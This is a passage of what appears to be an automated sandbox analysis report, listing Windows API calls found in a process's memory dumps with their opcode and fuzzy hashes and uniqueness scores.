                                                                                            Function 01C2B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 939023d4442492170e6d44b82744b51721867ade0cb792dd5aeba9210477239c
                                                                                            • Instruction ID: 2641fbc725e281804818c24fb988818082154498b8716ada5afc17a84a760654
                                                                                            • Opcode Fuzzy Hash: 939023d4442492170e6d44b82744b51721867ade0cb792dd5aeba9210477239c
                                                                                            • Instruction Fuzzy Hash: DC117FB1600704EFEB21CF56DC85FA6FBA8EF04660F14856AE905CB251D674E9048AA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 021D0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: dc81cad19f2dd53465660dfe13bc486d7bc27eddbf1743774dc46c98084c96c4
                                                                                            • Instruction ID: dd44b35df9dfedc3b95f520e2c209b5be82871390d01f5c7c9d7236d26a2a879
                                                                                            • Opcode Fuzzy Hash: dc81cad19f2dd53465660dfe13bc486d7bc27eddbf1743774dc46c98084c96c4
                                                                                            • Instruction Fuzzy Hash: F4219D7150D3C09FDB12CB25DC55B92BFB4EF07224F1D84DAE8888F293D2659808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 1d380c4883bf79de20214da4f31e2d40a7333f87b4423fee970e93f05e7401ef
                                                                                            • Instruction ID: 3f48edadd98f77bee70a25bebd7b118ddbdbedd45363b84b8ae203910bc2bf43
                                                                                            • Opcode Fuzzy Hash: 1d380c4883bf79de20214da4f31e2d40a7333f87b4423fee970e93f05e7401ef
                                                                                            • Instruction Fuzzy Hash: 3F219272548780AFDB21CF25DC85B96FFF4EF06220F08849EED858B562D335A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01C2AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 4ca47b6b74fafd1aeaa24ee826972210eff3c36e59eed93e0d31f3eaad18c93c
                                                                                            • Instruction ID: 7fb707546fa493385d0f86715842a7f73fe829d47eb78a6e0f5ddae4b96c9fa6
                                                                                            • Opcode Fuzzy Hash: 4ca47b6b74fafd1aeaa24ee826972210eff3c36e59eed93e0d31f3eaad18c93c
                                                                                            • Instruction Fuzzy Hash: D32172B16053809FEB22CF29DC45B52FFE8EF56210F0884AAED49CB653D265E804CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01C2BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 7773dfe4a6e28f27ba13fbb119c10e8484667ad07b84e8178b3938fe18a6ba47
                                                                                            • Instruction ID: 9df382b17630c1bd32f57898c8eab59c704bedf4db6884ee979c0b2c6269df72
                                                                                            • Opcode Fuzzy Hash: 7773dfe4a6e28f27ba13fbb119c10e8484667ad07b84e8178b3938fe18a6ba47
                                                                                            • Instruction Fuzzy Hash: 6621A1725093C09FEB128B25DC55B92BFE4EF07320F0984DBDD858F263D224A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 021D1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 0f5aa1119009681bb9f75e56f59ba602b47b440cfbec60b671b4157114ddadf0
                                                                                            • Instruction ID: c637f4f3947e11c8e871840f775bd941677ad9c524a9147cc3c52c235d1a25d1
                                                                                            • Opcode Fuzzy Hash: 0f5aa1119009681bb9f75e56f59ba602b47b440cfbec60b671b4157114ddadf0
                                                                                            • Instruction Fuzzy Hash: FA216D6140D3C4AFD7138B259C54A62BFB4EF57620F0981DBD8858F2A3D2695808D7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 01C2AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: cdbada12c95b0d6f5081056144902ce33e18a11024b70d79aafa966f4e0c2b38
                                                                                            • Instruction ID: 9b41118d565937edf60c74d4ad5e6ce988d283fd62c33b0f8df205e06d4f673e
                                                                                            • Opcode Fuzzy Hash: cdbada12c95b0d6f5081056144902ce33e18a11024b70d79aafa966f4e0c2b38
                                                                                            • Instruction Fuzzy Hash: 461104B1500700EFEB21DF55DC85FAAFBA8EF44320F14886AED058B181C674E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01C2BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: f3a9ac598065e88be5a8886c6b5ce4b7103526ac2bbb8f375d2bdb342db0e0ab
                                                                                            • Instruction ID: ab091a701cc30a789db4eb80cf0418f1bfc96f181d495493a365eb5f6e9668a0
                                                                                            • Opcode Fuzzy Hash: f3a9ac598065e88be5a8886c6b5ce4b7103526ac2bbb8f375d2bdb342db0e0ab
                                                                                            • Instruction Fuzzy Hash: 5D118E71504384EFDB22CF65CC45B52FFF4EF15210F08859AE9858B662D275E818DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 021D08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: a1dd132b2de17c2dd5acb30af4859c23e064f4dd59e2526a24cafaf549c5ddb5
                                                                                            • Instruction ID: 4aaf425e0ca7d592ca73457c7cb9de927ec3ef5a1883c5ab227535e3c0f36bc2
                                                                                            • Opcode Fuzzy Hash: a1dd132b2de17c2dd5acb30af4859c23e064f4dd59e2526a24cafaf549c5ddb5
                                                                                            • Instruction Fuzzy Hash: 9011BF72440704EFEB21CF51DC85FA6FBA8EF18720F14856AE9499A241C771A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: 6cb7b431e475d4ac357bf133e57a8b21c0dce2fab7dc8c493cc02a955f1022a0
                                                                                            • Instruction ID: a15473e06cd8bb8e765349e041b899c8c950030859056c28ca6fa83a9a714b96
                                                                                            • Opcode Fuzzy Hash: 6cb7b431e475d4ac357bf133e57a8b21c0dce2fab7dc8c493cc02a955f1022a0
                                                                                            • Instruction Fuzzy Hash: BB118F714093C49FEB128B25DC54A62FFB4DF47614F0884CBEDC58F263D265A908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 021D132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: df81d41d8179b8ee079b284671344cb03af498761b60a9eab41d1b461a725cae
                                                                                            • Instruction ID: b38639c231cdde1b4f5292a57143215528cff1d827f80381cff21d9b75a8a587
                                                                                            • Opcode Fuzzy Hash: df81d41d8179b8ee079b284671344cb03af498761b60a9eab41d1b461a725cae
                                                                                            • Instruction Fuzzy Hash: 52119471509384AFDB118F65DC45B96FFE4EF06220F0984EFED498B252D375A804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 021D0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: de4a66cc52022b4534c14108c3978f9d3b193b69d6ef0ab1146639e01048e4f1
                                                                                            • Instruction ID: 26e6167432fe9b48b12c53f2c08d87c5a1ca892bd120ae087cbdaa9e4211de97
                                                                                            • Opcode Fuzzy Hash: de4a66cc52022b4534c14108c3978f9d3b193b69d6ef0ab1146639e01048e4f1
                                                                                            • Instruction Fuzzy Hash: 7B1102755093C09FDB128B25DC84B52FFB4DF46220F0880DBED858B663D265A808CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01C2AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 657947c2a40ef39f8a7760d041ed4115890ac2968a1e63ffe52dc55b36ffdedf
                                                                                            • Instruction ID: b37892a79ba07169e4344e8babaf45248c35f03e2dc005f1727adef85a99fc1d
                                                                                            • Opcode Fuzzy Hash: 657947c2a40ef39f8a7760d041ed4115890ac2968a1e63ffe52dc55b36ffdedf
                                                                                            • Instruction Fuzzy Hash: 011161B1600700DFEB20DF2ADC85B56FBD8EF14621F08C86ADD49CBA42D675E504CA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01C2AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 4f3ee317cd2bd10b0582dc17ba0c081a32b3dc4f847e0c80e3dffedf258bff91
                                                                                            • Instruction ID: 0a3e404e3dd7c489b48e84803adf1d8733fc206dc6f54e33fb558f11043a6523
                                                                                            • Opcode Fuzzy Hash: 4f3ee317cd2bd10b0582dc17ba0c081a32b3dc4f847e0c80e3dffedf258bff91
                                                                                            • Instruction Fuzzy Hash: A111917540D7C09FDB128B25DC85A91BFA4EF13324F0980DBDD858F163D269A909DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 021D099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 91877786dd36ebcf7e4da8404a83f28086576d77f85b34127f8fb293b632646d
                                                                                            • Instruction ID: 6f24a6b4b0effb968154524c742635cf01fdeacfd7afa5aa63a9504ab7f67e7e
                                                                                            • Opcode Fuzzy Hash: 91877786dd36ebcf7e4da8404a83f28086576d77f85b34127f8fb293b632646d
                                                                                            • Instruction Fuzzy Hash: 281190714097C49FEB128B25DC55B92FFA4EF07324F0981DAD9884B163C265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FD2A8D51,00000000,00000000,00000000,00000000), ref: 021D0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 465889ad94bb2a4dcae576f5d6ed7de4c5650e7cc85f5ca3059920085ca3b22a
                                                                                            • Instruction ID: f1c5573378f9d535918fcb4841103e1542511972c2d849e2f44c08bf91026689
                                                                                            • Opcode Fuzzy Hash: 465889ad94bb2a4dcae576f5d6ed7de4c5650e7cc85f5ca3059920085ca3b22a
                                                                                            • Instruction Fuzzy Hash: DF018071940704EFFB20DF15DC85BA6FB98DF44720F1485AAED099A241D774A904CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: a8d20ab74cade5e18fbaca98447358db9ceded29fadb8e00d8cd48688fadb6b7
                                                                                            • Instruction ID: 12e42b21f0cce78fbfeaecc44f2f4adccf7ba856cd97ef15c3119f1ec2f62ac6
                                                                                            • Opcode Fuzzy Hash: a8d20ab74cade5e18fbaca98447358db9ceded29fadb8e00d8cd48688fadb6b7
                                                                                            • Instruction Fuzzy Hash: 33118B76540700EFEB20CF56EC85B66FBA4EF04220F0885AAED4A8B652D771E408DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 01C2ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 5edfde14355b83a61e7d379c118ea331d6cf20979f42f96b060ead3be8943ea8
                                                                                            • Instruction ID: c91c48ca0ff4f83fe8aaac113ec20b164c42068be71843788a2cde58ec25d1a3
                                                                                            • Opcode Fuzzy Hash: 5edfde14355b83a61e7d379c118ea331d6cf20979f42f96b060ead3be8943ea8
                                                                                            • Instruction Fuzzy Hash: 5911CEB54093809FDB11CF25DC89B92FFA4EF02320F0984ABED488F253D275A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01C2BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: dd3876144dd14b0ae7f0cae867d1014dce35e4a3ed44eb9fb35df86fc24f8d61
                                                                                            • Instruction ID: 9c7ebdea621f8ffc0b4269060f9a17025fc9052b63f03ca9a45adf3f1a517388
                                                                                            • Opcode Fuzzy Hash: dd3876144dd14b0ae7f0cae867d1014dce35e4a3ed44eb9fb35df86fc24f8d61
                                                                                            • Instruction Fuzzy Hash: 3F118E72500704DFEF21CF56DC85B62FBE4EF14211F0885AADE8A8A612D371E914DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01C2A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: d13ae27e3dbe6eaad36f7e5c6fdb5d591b38cbf396a26cd433c18ea8f4bc5584
                                                                                            • Instruction ID: 7a266ff5788863f56b25181382ed882e28ab7df2e14184dce35f00eb36fbc120
                                                                                            • Opcode Fuzzy Hash: d13ae27e3dbe6eaad36f7e5c6fdb5d591b38cbf396a26cd433c18ea8f4bc5584
                                                                                            • Instruction Fuzzy Hash: AC017171900600AFE710DF26DC46B66FBA8FB84A20F14856AED089B741D235F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 021D01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 97ea9ed813bce11bd21233e772a6892b31d52d38d02c23ca97b8a422a86aea00
                                                                                            • Instruction ID: d6776777cdba37fc4881a1d6299cfcc25b6008c2ad50d75bef2d8380980f1d1b
                                                                                            • Opcode Fuzzy Hash: 97ea9ed813bce11bd21233e772a6892b31d52d38d02c23ca97b8a422a86aea00
                                                                                            • Instruction Fuzzy Hash: 63019E71640704CFEB10DF26DC857A6FB98DB05320F0884AADC09CB642D774E804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 021D109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 402ecbcedb4e9c4ea6449b610d416d7f944af886534781d721271c0be887774c
                                                                                            • Instruction ID: 985769117cf9c50aeb6de2b072b52d41955813bcf3344b77e8dd31b6584cb2cf
                                                                                            • Opcode Fuzzy Hash: 402ecbcedb4e9c4ea6449b610d416d7f944af886534781d721271c0be887774c
                                                                                            • Instruction Fuzzy Hash: 12017171900600AFE710DF26DC46B66FBA8FB84B20F14856AED099B741D235F915CBE5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01C2BB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: 85d0ea09726f2dfb69d58c825f04f38a3362de252ce3a34283481611baad7538
                                                                                            • Instruction ID: 1c73f4c6bc2ce8f80f9624b46e7204bf0b1ef3cd35ad66415c6852755b5ca124
                                                                                            • Opcode Fuzzy Hash: 85d0ea09726f2dfb69d58c825f04f38a3362de252ce3a34283481611baad7538
                                                                                            • Instruction Fuzzy Hash: 5601DF75500600DFEF20CF19DC857A5FBA4EF04620F08C4ABDD498B656D275E904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 021D132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 517df129e77d8b469dd9e57a333d5193b3b2188196c169bb9289d6e35aa2c018
                                                                                            • Instruction ID: a2bc5eed18fc71e6eb8a60dab39885881dd3bb0614fead950305bfb92f414685
                                                                                            • Opcode Fuzzy Hash: 517df129e77d8b469dd9e57a333d5193b3b2188196c169bb9289d6e35aa2c018
                                                                                            • Instruction Fuzzy Hash: 9501BC75504300EFEF208F15D8857A6FBA4EF04620F08C8AADD098B652D375A404CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01C2A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2102090085.0000000001C2A000.00000040.00000001.sdmp, Offset: 01C2A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 5e31dca333431fcbfe63444b36768c18b3823d3a5acad9f16a830fafa0ba1768
                                                                                            • Instruction ID: a29de5cd40787cafd755fa26101179ec6df6a9c3304d39deaf6d56dae5ea8022
                                                                                            • Opcode Fuzzy Hash: 5e31dca333431fcbfe63444b36768c18b3823d3a5acad9f16a830fafa0ba1768
                                                                                            • Instruction Fuzzy Hash: 40016271940600ABD714DF16DC46B26FBA4FB88B20F14825AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 021D0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 75a4f4448230abc537bc6be116583ec30a1ee919537bd95a52acba10b65c2b92
                                                                                            • Instruction ID: fbd1c8c5d0cc9e0ff2ca9c6fd83051af23c8330a6c49d7fafb6368a40fa31fa7
                                                                                            • Opcode Fuzzy Hash: 75a4f4448230abc537bc6be116583ec30a1ee919537bd95a52acba10b65c2b92
                                                                                            • Instruction Fuzzy Hash: 7D016271940600ABD714DF16DC46B26FBA4FB88B20F14825AED085B741D275F915CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 021D0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 9f32c76bf1bdb1fb5bfbd0418fef5c9e85b68607a2f5132b9364a18a8799dd38
                                                                                            • Instruction ID: 617de00d323d0968bfd6476b09896d394ab6c073a5c95c41aecee850e1f65911
                                                                                            • Opcode Fuzzy Hash: 9f32c76bf1bdb1fb5bfbd0418fef5c9e85b68607a2f5132b9364a18a8799dd38
                                                                                            • Instruction Fuzzy Hash: 75017C71544340DFEB20DF15D885B66FB94EB04720F2884AADC498F246D375E844CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021D060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 021D0640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2103980928.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 1bce40ff2c5d95166af3ebfdccd8c58c41ef7d4ef99d11b0334fe3465308f178
                                                                                            • Instruction ID: 79d3a614985aaade53e99e2261f18452ba0d1c1a61af45043817a04b4684463e
                                                                                            • Opcode Fuzzy Hash: 1bce40ff2c5d95166af3ebfdccd8c58c41ef7d4ef99d11b0334fe3465308f178
                                                                                            • Instruction Fuzzy Hash: 0401FF79644700CFEF209F16DC85761FBA0EF49720F08C0AADD4A8B752D375E808DAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01C2AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
